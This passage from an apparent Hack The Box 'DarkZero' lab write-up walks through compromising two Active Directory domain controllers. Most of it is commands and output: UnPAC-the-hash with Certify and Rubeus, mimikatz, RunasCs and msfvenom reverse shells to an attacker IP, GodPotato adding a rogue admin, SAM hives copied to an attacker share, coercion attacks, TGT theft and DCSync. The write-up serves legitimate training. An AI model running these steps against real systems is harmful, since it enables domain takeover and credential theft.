We will then request a valid user login certificate.

```text title="Victim Windows (DC02)" icon="windows" expandable theme={null}
.\Certify.exe request --ca darkzero.ext\darkzero-ext-DC02-CA --template user

   _____          _   _  __          
  / ____|        | | (_)/ _|         
 | |     ___ _ __| |_ _| |_ _   _    
 | |    / _ \ '__| __| |  _| | | |   
 | |___|  __/ |  | |_| | | | |_| |   
  \_____\___|_|   \__|_|_|  \__, |   
                             __/ |   
                            |___./   
  v2.0.0                         

[*] Action: Request a certificate

[*] Current user context    : darkzero-ext\svc_sql
[*] No subject name specified, using current context as subject.

[*] Template                : user
[*] Subject                 : CN=svc_sql, CN=Users, DC=darkzero, DC=ext

[*] Certificate Authority   : darkzero.ext\darkzero-ext-DC02-CA
[*] CA Response             : The certificate has been issued.
[*] Request ID              : 3

[*] Certificate (PFX)       :

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

Certify completed in 00:00:10.7667918
```

The above Base64 output can be used in Rubeus. But again due to the input limit, we can't use the base64 string directly in our reverse shell. However, we can actually use the following command to extract the base64 ticket on Windows. We first save the whole `Certify.exe` output with `--out-file`:

```powershell title="Victim Windows (DC02)" icon="windows" theme={null}
.\Certify.exe request --ca darkzero.ext\darkzero-ext-DC02-CA --template user --out-file output.txt
```

We then use Regex to extract only the Base64 value from the output:

```powershell title="Victim Windows (DC02)" icon="windows" theme={null}
type output.txt | findstr /R "^[A-Za-z0-9+/=][A-Za-z0-9+/=]*$" > .\base64.txt
```

We still have to decode the base64 string to extract the certificate in binary form:

```powershell title="Victim Windows (DC02)" icon="windows" theme={null}
certutil -f -decode .\base64.txt .\cert.pfx
```

Now, we can use Rubeus's `asktgt` module to extract the user's NTLM hash using the `/getcredentials` flag. We have now extracted the `svc_sql` user's NTLM hash, and we will use that to obtain a cleartext password for changing our logon type.

```text title="Victim Windows (DC02)" icon="windows" theme={null}
.\Rubeus.exe asktgt /user:svc_sql /domain:darkzero.ext /dc:dc02.darkzero.ext /certificate:.\cert.pfx /getcredentials
...
[*] Action: Ask TGT


[*] Using PKINIT with etype rc4_hmac and subject: CN=svc_sql, CN=Users, DC=darkzero, DC=ext 
[*] Building AS-REQ (w/ PKINIT preauth) for: 'darkzero.ext\svc_sql'
[*] Using domain controller: ::1:88
[+] TGT request successful!
[*] base64(ticket.kirbi):
...
...

  ServiceName              :  krbtgt/darkzero.ext
  ServiceRealm             :  DARKZERO.EXT
  UserName                 :  svc_sql
  UserRealm                :  DARKZERO.EXT
  StartTime                :  11/16/2025 3:49:05 AM
  EndTime                  :  11/16/2025 1:49:05 PM
  RenewTill                :  11/23/2025 3:49:05 AM
  Flags                    :  name_canonicalize, pre_authent, initial, renewable, forwardable
  KeyType                  :  rc4_hmac
  Base64(key)              :  fw17G0FG5us/sX0CKt9AEQ==
  ASREP (key)              :  45FD150C2B1E880447125DFF39CBFDD8

[*] Getting credentials using U2U

  CredentialInfo         :
    Version              : 0
    EncryptionType       : rc4_hmac
    CredentialData       :
      CredentialCount    : 1
       NTLM              : 816CCB849956B531DB139346751DB65F
```

### Changing svc\_sql's password with NTLM

We can use `mimikatz`'s `lsadump::changentlm` module to change our password using NLTM auth: [changentlm | The Hacker Tools](https://tools.thehacker.recipes/mimikatz/modules/lsadump/changentlm).

```powershell title="Victim Windows (DC02)" icon="windows" theme={null}
wget 10.10.14.52/mi64/mimikatz.exe -o mimikatz.exe
.\mimikatz.exe
```

In our Mimikatz interface, we will run the following command.

```text title="mimikatz console" icon="windows" theme={null}
lsadump::changentlm /server:dc02.darkzero.ext /user:svc_sql /old:816CCB849956B531DB139346751DB65F /newpassword:P@ss1234
...
OLD NTLM     : 816ccb849956b531db139346751db65f
NEW NTLM     : 74520a4ec2626e3638066146a0d5ceae

Target server: dc02.darkzero.ext
Target user  : svc_sql
Domain name  : darkzero-ext
Domain SID   : S-1-5-21-1969715525-31638512-2552845157
User RID     : 1103

>> Change password is a success!
```

#### Logging in with Logon Type 5 (Service)

With the new password, we can now use `RunasCs.exe`:

```powershell title="Victim Windows (DC02)" icon="windows" theme={null}
wget 10.10.14.52/RunasCs.exe -o RunasCs.exe
```

We can run a shell to with logon type 5. We must run with the flag `--bypass-uac` to spawn the process without token limitations. This will essentially give us back our privileges.

```powershell title="Victim Windows (DC02)" icon="windows" theme={null}
.\RunasCs.exe svc_sql P@ss1234 powershell.exe -r 10.10.14.52:443 --logon-type 5 --bypass-uac
```

We now got a privileged shell that we can run impersonation attacks with Potatoes.

```text title="Victim Windows (DC02)" icon="windows" theme={null}
PS C:\Users\svc_sql> whoami /priv
whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State   
============================= ========================================= ========
SeMachineAccountPrivilege     Add workstations to domain                Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled 
SeImpersonatePrivilege        Impersonate a client after authentication Enabled 
SeCreateGlobalPrivilege       Create global objects                     Enabled 
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled
```

### Escalating to SYSTEM with SeImpersonatePrivilege

#### Getting GodPotato on the victim machine

With the `SeImpersonate` privilege, we can escalate our privilege to system using potato exploits. Here we'll use GodPotato:

* [https://github.com/BeichenDream/GodPotato](https://github.com/BeichenDream/GodPotato)

```text title="Victim Windows (DC02) - New Shell from RunasCs.exe" icon="windows" theme={null}
wget 10.10.14.52/potato/GodPotato-NET4.exe -o GodPotato.exe
```

Note that `.NET` version of the GodPotato binary has to match with the `.NET` version installed on the target machine. We can check that with the following command.

```text title="Victim Windows (DC02) - New Shell from RunasCs.exe" icon="windows" theme={null}
reg query "HKLM\SOFTWARE\Microsoft\NET Framework Setup\NDP" /s
```

#### Running God Potato

While you can do things like starting a reverse shell, I prefer adding a new administrator user, since `GodPotato` often cannot run stable reverse shells.

```text title="Victim Windows (DC02) - New Shell from RunasCs.exe" icon="windows" theme={null}
.\GodPotato.exe -cmd "cmd /c net user hacker password123! /add && net localgroup administrators hacker /add"
```

#### Switching to the admin shell

We will run the reverse shell with our new administrator user using `RunasCs.exe` again.

```text title="Victim Windows (DC02) - New Shell from RunasCs.exe" icon="windows" theme={null}
.\RunasCs.exe hacker password123! --logon-type 8 powershell.exe -r 10.10.14.52:443
```

On our reverse shell listener on port 443, we have successfully received a system level reverse shell.

```text title="Victim Windows (DC02) - System Shell from RunasCs.exe" icon="windows" theme={null}
PS C:\Windows\system32> whoami
darkzero-ext\hacker
PS C:\Windows\system32> cat c:\users\administrator\desktop\user.txt
4e00a52e5bde65df28fce67533ce894c
```

### Unintended Path (CVE\_2024\_30088)

#### Exploiting Unpatched Windows Kernel Vulnerability

There is also an unintended privilege escalation path that exploits a kernel vulnerability. This can be discovered via Metasploit's `local_exploit_suggester` module.

We first generate a Meterpreter reverse shell payload for Windows. We then upload the generated payload to DC02.

```sh title="Attacker Linux" icon="linux" theme={null}
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.14.52 LPORT=4444 -f exe -o shell.exe 
```

We then start a multi/handler on Metasploit and start a Meterpreter shell. Remember to correct set the payload.

```text title="msfconsole" icon="skull" theme={null}
set payload windows/x64/meterpreter/reverse_tcp
```

Then, we can use the following module to exploit this unpatched kernel exploit. I used `windows/x64/shell_reverse_tcp` as the payload and set up a non-Meterpreter listener to make things easier.

```text title="msfconsole" icon="skull" theme={null}
use windows/local/cve_2024_30088_authz_basep
```

On our listener, we got a system shell.

```text title="Victim Windows (DC02)" icon="windows" theme={null}
C:\Windows\system32>whoami
nt authority\system
```

## Privilege Escalation

***

There is a `cleanup.ps1` file in the Documents folder of the `darkzero.ext` admin.

* Nothing of special interest. Just for cleaning up the box.

### Dumping Administrator NTLM hash from DC02

#### Extracting SAM hive & System

With the system shell, we can dump the SAM hive locally to extract NTLM hashes. We will then use the same file transfer method to copy the dumped hives to our SMB share.

```text title="Victim Windows (DC02)" icon="windows" theme={null}
reg save hklm\system system.hive
reg save hklm\sam sam.hive
net use Z: \\10.10.14.52\share /user:test test
copy sam.hive \\10.10.14.52\share\
copy system.hive \\10.10.14.52\share\ 
```

We can then extract the NTLM hashes on our Attacker Linux using `impacket`'s `secretsdump.py`.

```sh title="Attacker Linux" icon="linux" theme={null}
impacket-secretsdump -sam sam.hive -system system.hive LOCAL
...
administrator:6963aad8ba1150192f3ca6341355eb49
```

Alternatively, we can dump credentials with` mimikatz`'s `lsadump::sam` module.

```text title="Victim Windows (DC02)" icon="windows" theme={null}
.\mimikatz.exe "lsadump::sam
...
User : Administrator
  Hash NTLM: 6963aad8ba1150192f3ca6341355eb49
```

We can verify the admin hash using `NetExec`'s LDAP module. Note that we are directly authenticating to DC01 with the administrator credentials of DC02.

```text title="Attacker Linux" icon="linux" theme={null}
nxc ldap 10.129.215.80 -d darkzero-ext -u administrator -H 6963aad8ba1150192f3ca6341355eb49
...
LDAP        10.129.215.80     389    DC01             [*] Windows 11 / Server 2025 Build 26100 (name:DC01) (domain:darkzero-ext) (signing:Enforced) (channel binding:When Supported) 
LDAP        10.129.215.80     389    DC01             [+] darkzero-ext\administrator:6963aad8ba1150192f3ca6341355eb49 (Pwn3d!)
```

### Enumerating Forest Trust

Since we are in a forest environment, we should enumerate the trust relationships & potential delegations between domains.

#### Searching for Unconstrained Delegation with NetExec

We can use `NetExec`'s built-in module to enumerate delegation ([https://www.netexec.wiki/ldap-protocol/unconstrained-delegation](https://www.netexec.wiki/ldap-protocol/unconstrained-delegation)). As we can see, the `DC01$` machine has the flag `TRUSTED_FOR_DELEGATION` set.

```text title="Attacker Linux" icon="linux" theme={null}
└─$ nxc ldap 10.129.215.80 -d darkzero-ext -u administrator -H 6963aad8ba1150192f3ca6341355eb49 --trusted-for-delegation
LDAP        10.129.215.80     389    DC01             [*] Windows 11 / Server 2025 Build 26100 (name:DC01) (domain:darkzero-ext) (signing:Enforced) (channel binding:When Supported) 
LDAP        10.129.215.80     389    DC01             [+] darkzero-ext\administrator:6963aad8ba1150192f3ca6341355eb49 (Pwn3d!)
LDAP        10.129.215.80     389    DC01             DC01$
```

#### Enumerating Domain Trust with NetExec

We can also use `NetExec`'s built-in module to enumerate domain trust ([https://www.netexec.wiki/ldap-protocol/dc-list](https://www.netexec.wiki/ldap-protocol/dc-list)). We can read more about Domain Trust here: [Trusts | The Hacker Recipes](https://www.thehacker.recipes/ad/movement/trusts/#unconstrained-delegation-abuse).

```
┌──(kali㉿kali)-[~/Desktop/HTB/s9/DarkZero]
└─$ nxc ldap 172.16.20.1 -d darkzero-ext -u administrator -H 6963aad8ba1150192f3ca6341355eb49 --dc-list               
LDAP        172.16.20.1     389    DC01             [*] Windows 11 / Server 2025 Build 26100 (name:DC01) (domain:darkzero-ext) (signing:Enforced) (channel binding:When Supported) 
LDAP        172.16.20.1     389    DC01             [+] darkzero-ext\administrator:6963aad8ba1150192f3ca6341355eb49 (Pwn3d!)
LDAP        172.16.20.1     389    DC01             DC01.darkzero.htb = 172.16.20.1
LDAP        172.16.20.1     389    DC01             [+] Found DC in trusted domain: dc02.darkzero.ext
LDAP        172.16.20.1     389    DC01             darkzero.ext -> Bidirectional -> Forest Transitive, Cross Organization Enable TGT Delegation
LDAP        172.16.20.1     389    DC01             dc02.darkzero.ext = 172.16.20.2
```

#### Attempting to request for login certificate as Administrator

Since we have cross-forest trust, maybe we can directly request for a domain administrator TGT? The answer is no, and this will fail since this is not how cross-domain trust works. Our DC02 admin credentials do not grant us domain administrator rights on DC01.

```sh title="Attacker Linux" icon="linux" theme={null}
certipy req -u administrator@darkzero.ext -hashes '6963aad8ba1150192f3ca6341355eb49' -dc-ip 172.16.20.1 -target 'dc01.darkzero.htb' -ca 'darkzero-DC01-CA' -template 'Administrator' -pfx administrator.pfx 
```

Since we do not have any actual permission on DC01, attacks like abusing write privileges with ESC4 will not work.

```sh title="Attacker Linux" icon="linux" theme={null}
certipy template -u 'administrator@darkzero.ext' -hashes '6963aad8ba1150192f3ca6341355eb49' -template User -dc-ip 172.16.20.1 -write-default-configuration
```

### Abusing Unconstrained Delegation

After some Googling, we came across a great article on explain how we can abuse cross-forest trusts.

* [Hunting in Active Directory: Unconstrained Delegation & Forests Trusts | by Roberto Rodriguez | Posts By SpecterOps Team Members](https://posts.specterops.io/hunting-in-active-directory-unconstrained-delegation-forests-trusts-71f2b33688e1)

Essentially, in a two-way (bidirectional) trusted forest, users from one forest can authenticate to another forest's resource. Kerberos TGT issued by either forest can also flow between forest.

* If we controlled one of the forest, and a privileged user of the other forest authenticate to our controlled forest with their TGT due to the trust relationship, we can capture and dump their ticket.
* With the privileged ticket, we can then authenticate to the original forest as the privileged user.
* Combining this with coercion attacks, we can essentially force the Domain Controller of target forest to authenticate to our controlled forest DC, and capture the TGT of the DC machine.

On our System shell of DC02, we can run Rubeus's monitor module to capture any incoming authentication to capture their TGT. We will run `Rubeus.exe` on DC02 in an elevated shell (i.e. system shell).

```text title="Victim Windows (DC02) - System Shell" icon="windows" theme={null}
.\Rubeus.exe monitor /interval:5
```

We now can force the target DC (DC01) to authenticate to DC02. We can try running `SpoolSample.exe` on another shell on DC02. Unfortunately this didn't work, as the `printspooler` service was not running on the machine.

```text title="Victim Windows (DC02)" icon="windows" theme={null}
.\SpoolSample.exe dc01.darkzero.htb dc02.darkzero.ext
```

#### Check if the target is vulnerable to Force Authentication

Luckily, `NetExec` has a module that can perform all coerce attacks. While DC02 is not vulnerable to the printer bugs, it is vulnerable to the other coercion attacks.

```sh title="Attacker Linux" icon="linux" theme={null}
nxc smb '10.129.215.80' -d 'darkzero-ext' -u 'administrator' -H '6963aad8ba1150192f3ca6341355eb49' -M coerce_plus
...
VULNERABLE, DFSCoerce
VULNERABLE, PetitPotam
VULNERABLE, MSEven
```

There is also another coercion attack that targets any user currently logged on the same machine, but we did not test it here.

* [antonioCoco/RemotePotato0: Windows Privilege Escalation from User to Domain Admin.](https://github.com/antonioCoco/RemotePotato0)

#### Running the Force Authentication attack

Again, on our System shell of DC02, we can run Rubeus's monitor module to capture any incoming authentication to capture their TGT.

```text title="Victim Windows (DC02) - System Shell" icon="windows" theme={null}
.\Rubeus.exe monitor /interval:5
```

We can use the same module from NetExec to initiate the authentication. The `-o` flag is used to specify the module options. Here, we have to set the `L=` for the target listener, i.e., where the victim machine will be authenticating to.

```sh title="Attacker Linux" icon="linux" theme={null}
nxc smb '10.129.215.80' -d 'darkzero-ext' -u 'administrator' -H '6963aad8ba1150192f3ca6341355eb49' -M coerce_plus -o L=dc02.darkzero.ext
```

#### Using the Captured TGT

We successfully got our TGT on the Rubeus monitor after triggering the coercion attacks. This is the Base64 encoded blob of the TGT of `DC01$`.

```text title="Rubues Output" icon="windows" theme={null}
doIFjDCCBYigAwIBBaEDAgEWooIElDCCBJ....
```

We can now renew and inject the TGT into our current machine (`DC02$`).

```text title="Victim Windows (DC02) - System Shell" icon="windows" theme={null}
.\Rubeus.exe renew /ticket:doIFjDCCBYigAwIBBaEDAgEWooIElDCCBJBhggSMMIIEiKADAgEFoQ4bDERBUktaRVJPLkhUQqIhMB+gAwIBAqEYMBYbBmtyYnRndBsMREFSS1pFUk8uSFRCo4IETDCCBEigAwIBEqEDAgECooIEOgSCBDbEbR52cSpdrkhKRwIJtWLmRMAkH3wglJqhN6vBQIP9kWaEuLVSKp4+AHNFfXSL+RK2tDUOGGYjNNCG+A0D1CBAacgSent7q363vwsyHKWNqOYOVxrJ/nOvWp96stZ5rvjXbQO9K1neR09ZtKuBOk69RFPMHZrihWUhv1N/1nBVOKZeMfJ/pZr5RembAD2ccgkLcNOisVUsFYObsgPh9RGiKGt/hbZfGHGBODP678mmWsZqHItzoP9RyE4o5UVVYy2h881Uw7aS0bmviMs+tB1lQOW4D/noUUbSJeogmR/GXpybFU3ZnpW43kb2nlf7HejRrs82w7uInKHcejvssHX9fBL+oAvAeH0f7PjT0u7JI3w95sCdKtBhiMfme9R9oyDEFW1z+kyNDv9hDdfhkWfFj0W5I6NmhN0znCqZlDTB4EscaALreDPEUYpZWibfpha2SqkTwSKOd912sN9V3lEv74e6/sx5NSzbn2BQ/qVxhkvXNNZSOIbLthb1dSKR7buIiP2br8Pad92OOsSKhWK+1MlK2gfSnjM+LGekLFEbv0yckiIbjsgZdbyubVkHpaHRLmBbO2JrNMu6dCQIyOZp8FF+iizu+e+hAn1WVyKgpPFrykp+WdHezUhQgUinjhtpk+6xNnUJDTWR0puEjtjgV9YdRswiWW7jzv/Mbpg6KBhAUaeIzrjr0MZXhnDxVRzVRZVH4Y+AbWsCYDMuSLw7/ZnGQdZB340LGLuJAV0DW4vGaxZh3n/+jJK90ePawPWQazaGk1CQbp7MBf7/2vIDYfW8LbRjozFKc7+lZyFIFH1hjoBem/vsxIbQlZlP1TMS0cH/YsrG9MrE5GpmuFAPRaiZq19SjMZSKVWXagYGCMppiSCnIMK5DYPvSQxXQQ/UkZ2DQwIEmUeWgOjHJ5ocoAJ/6U0fLJbnBzIeSXtCv01UraDr82XY3H+kRERYpnHggw6v72q3ggk67SAZyr4WVlwes3EbHzSH4KR1LoFEpXJjHkUvuv9+z8iGbBWFcT+iiE5BwTEnC3qyxLd1tyGIvKzD0I/N+8qojkwJV6rQQ6xTOP5k5TykpXi3Hiv6b/bNbIH0G0SSEURRFhN50u2aB7pJXpqaFaTR/y1RL+ZjfaYSZUg2nNee6wvsPJT+LJ24WgL5Q7tuxZFMPyatM59nyh/RKZ0lyPNT0RFwAyGr4F6OzJsBWQviCdHdpTpF14NwB3DnAFDrdp0nfjRid+Fql+Pc159fr/O9/8sm8lpPWGu+abEv3J7YTOG8Z2j8zIyUiCZQURSBTKoATQEZscqmUlwXZvAj8L1mmlhKtmsytQcdmhYbS5Z3ojDiR9CiP6UadEDRJDk50HdqYF6oMmp/oGeWy6gL0vnWkOwNTyK1baHj6GdX1W0QgElgTRj/Ewicm0lNpx0WpOMkWT/4t6BnJUbpJznJo4HjMIHgoAMCAQCigdgEgdV9gdIwgc+ggcwwgckwgcagKzApoAMCARKhIgQgJDawWfD4142DWY8bFmDJajh7teEk0DHlc8BxyL6tCd+hDhsMREFSS1pFUk8uSFRCohIwEKADAgEBoQkwBxsFREMwMSSjBwMFAGChAAClERgPMjAyNTEwMDcwNDI4MzhaphEYDzIwMjUxMDA3MTQyODM3WqcRGA8yMDI1MTAxNDA0MjgzN1qoDhsMREFSS1pFUk8uSFRCqSEwH6ADAgECoRgwFhsGa3JidGd0GwxEQVJLWkVSTy5IVEI= /ptt
```

We can validate if we have successfully injected the TGT using the `klist` command:

```text title="Victim Windows (DC02) - System Shell" icon="windows" theme={null}
C:\Windows\system32> klist

Current LogonId is 0:0x3e7

Cached Tickets: (1)

#0>     Client: DC01$ @ DARKZERO.HTB
        Server: krbtgt/DARKZERO.HTB @ DARKZERO.HTB
        KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
        Ticket Flags 0x60a10000 -> forwardable forwarded renewable pre_authent name_canonicalize 
        Start Time: 10/6/2025 21:54:54 (local)
        End Time:   10/7/2025 7:54:53 (local)
        Renew Time: 10/13/2025 21:28:37 (local)
        Session Key Type: AES-256-CTS-HMAC-SHA1-96
        Cache Flags: 0x1 -> PRIMARY 
        Kdc Called: 
```

#### Dumping Credentials with DCSync

Lastly, with the injected DC01\$ machine TGT, we can perform a DCSync attack on DC01 using `mimikatz`. Remember to run `privilege::debug` to ensure we have enough privileges. We have successfully dumped NTLM hash of the Administrator of DC01.

```text title="Victim Windows (DC02) - System Shell" icon="windows" theme={null}
.\mimikatz.exe "privilege::debug" "lsadump::dcsync /domain:darkzero.htb /user:administrator" "exit"
...
Credentials:
  Hash NTLM: 5917507bdf2ef2c2b0a869a1cba40726
...
```

Lastly, we can dump out the root flag with `NetExec`.

```sh title="Attacker Linux" icon="linux" theme={null}
nxc smb '10.129.215.80' -u 'administrator' -H '5917507bdf2ef2c2b0a869a1cba40726' -x "type C:\users\administrator\desktop\root.txt"
...
4e567c90f1709e12e9f5ed7402687bfc
```

## Key Learning

***

#### 1. Enumerate MSSQL Linked Servers

There is a built-in function, `use_link` in `impacket`'s `mssqlclient.py`, which makes interaction with linked servers way easier.

#### 2. Always look for cached Kerberos tickets

The cached tickets can be dumped out be used on Linux, or to retrieve the NTLM hash if it belongs to a service account.

#### 3. Retrieve NTLM hash with Kerberos Ticket

Using the "UnPAC the hash" technique, we can retrieve the NTLM hash of a controlled service account by retrieve its Kerberos ticket (either by dumping or requesting), request a client-authentication certificate, and request a TGT to extract the NTLM hashes within the ticket.

We can achieve this by Certify.exe + Rubeus.exe on Windows.

```powershell title="Victim Windows (DC02)" icon="windows" theme={null}
.\Certify.exe request --ca darkzero.ext\darkzero-ext-DC02-CA --template user --out-file output.txt
```

* The cached ticket is used automatically if we are running this on the machine.

We then use Regex to extract only the Base64 value from the output:

```powershell title="Victim Windows (DC02)" icon="windows" theme={null}
type output.txt | findstr /R "^[A-Za-z0-9+/=][A-Za-z0-9+/=]*$" > .\base64.txt
```

We still have to decode the base64 string to extract the certificate in binary form:

